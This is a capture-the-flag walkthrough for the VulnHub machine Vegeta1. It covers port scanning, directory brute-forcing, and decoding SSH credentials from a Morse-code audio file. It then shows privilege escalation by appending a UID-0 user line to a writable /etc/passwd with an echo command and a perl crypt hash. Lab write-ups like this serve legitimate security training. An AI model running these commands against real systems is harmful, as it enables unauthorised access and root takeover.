Exploitation Guide for Vegeta1

This machine is exploited by recovering SSH credentials, which are encoded in Morse code inside an audio file. It is escalated by abusing misconfigured file permissions on /etc/passwd.


Check for open ports with Nmap:

kali@kali:~# sudo nmap
Starting Nmap 7.80 ( ) at 2020-08-04 09:50 EDT
Nmap scan report for
Host is up (0.039s latency).
Not shown: 998 closed ports
22/tcp open  ssh
80/tcp open  http

Just two ports open, let’s have a look at port 80: vegeta-website

Let’s try searching for hidden directories:

root@kali:~/vulnhub/vegeta-1# gobuster -t 100 dir -e -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u -x php
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Expanded:       true
[+] Timeout:        10s
2020/07/19 21:13:53 Starting gobuster
=============================================================== (Status: 200) (Status: 301) (Status: 301) (Status: 301) (Status: 301) (Status: 403) (Status: 301)
2020/07/19 21:19:10 Finished

We find a file and a few interesting sounding directories, let’s have a look:

└─$ wget 
--2021-09-23 08:23:47--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 236124 (231K)

Saving to: ‘hahahaha.wav’

hahahaha.wav 100%[=============================>] 230.59K 521KB/s in 0.4s

2021-09-23 08:23:48 (521 KB/s) - ‘hahahaha.wav’ saved [236124/236124]


Now we have a wav file, playing it we can tell it is morse code, use decoder to see what it says:


We get a user called trunks, with a password u$3r, let’s try that SSH port we found earlier:

root@kali:~/vulnhub/vegeta-1# ssh trunks@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:XL6IZaa/M6erCuxf2qEiDREMhwGWxwoGjo0XfO47bmU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
trunks@'s password:
Permission denied, please try again.
trunks@'s password:
Linux Vegeta 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun 28 21:16:00 2020 from

At last we have found a way in. One of the first things I do is look in user folder for clues, here we see .bash_history:

trunks@Vegeta:~$ ls -la
drwxr-xr-x 3 trunks trunks 4096 Jun 28 21:32 .
drwxr-xr-x 3 root   root   4096 Jun 28 17:37 ..
-rw------- 1 trunks trunks  382 Jun 28 21:36 .bash_history
-rw-r--r-- 1 trunks trunks  220 Jun 28 17:37 .bash_logout
-rw-r--r-- 1 trunks trunks 3526 Jun 28 17:37 .bashrc
drwxr-xr-x 3 trunks trunks 4096 Jun 28 19:45 .local
-rw-r--r-- 1 trunks trunks  807 Jun 28 17:37 .profile

Privilege EscalationPermalink

It is always worth checking this out, so we look at the contents:

trunks@Vegeta:~$ cat .bash_history
perl -le ‘print crypt(“Password@973″,”addedsalt”)’
perl -le 'print crypt("Password@973","addedsalt")'
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd[/sh]
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
su Tom
ls -la
cat .bash_history
sudo apt-get install vim
apt-get install vim
su root
cat .bash_history

We see a password being salted then a new user called Tom added. Strange that this is being done by the user. Let’s check permission of the passwd file:

trunks@Vegeta:~$ ls -la /etc/passwd
-rw-r--r-- 1 trunks root 1486 Jun 28 21:23 /etc/passwd

We have write permissions as user trunks, let’s look at the passwd file:

root@Vegeta:/home/trunks# cat /etc/passwd

User Tom isn’t in passwd, but we can add him be using the line from the history file:

trunks@Vegeta:~$ echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd

Now we can switch user to Tom using the password Password@973 we found above:

trunks@Vegeta:~$ su Tom
Password: (enter Password@973)
root@Vegeta:/home/trunks# id
uid=0(root) gid=0(root) groups=0(root)
Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *